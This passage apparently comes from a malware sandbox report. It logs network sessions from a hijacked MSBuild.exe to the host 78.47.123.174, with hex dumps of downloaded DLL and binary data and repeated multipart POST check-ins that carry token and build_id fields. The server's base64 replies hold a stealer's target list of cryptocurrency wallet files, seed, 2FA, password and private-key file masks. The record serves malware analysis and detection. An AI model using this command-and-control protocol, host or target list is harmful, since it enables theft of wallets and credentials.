                                                                                        Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                        Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                        Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                        Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                        Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.44976178.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:28 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:29 UTC245INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:29 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 80880
                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                        Connection: close
                                                                                        ETag: "6315a9f4-13bf0"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:29 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                        2024-05-24 08:27:29 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                        Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                        2024-05-24 08:27:29 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                        Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                        2024-05-24 08:27:29 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                        Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                        2024-05-24 08:27:29 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                        Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.44976278.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:30 UTC279OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 1145
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:30 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------GCAKKECAEGDGCBFIJEGHCont
                                                                                        2024-05-24 08:27:30 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.44976378.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:31 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------IDHDGDHJEGHIDGDHCGCBCont
                                                                                        2024-05-24 08:27:32 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:32 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.44976478.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:32 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------AFHDAKJKFCFBGCBGDHCBCont
                                                                                        2024-05-24 08:27:33 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.44976578.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:34 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------DGCAAFBFBKFIDGDHJDBKCont
                                                                                        2024-05-24 08:27:35 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:35 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                        Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.44976678.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:35 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 453
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:35 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------DAAFBAKECAEGCBFIEGDGCont
                                                                                        2024-05-24 08:27:36 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:36 GMT
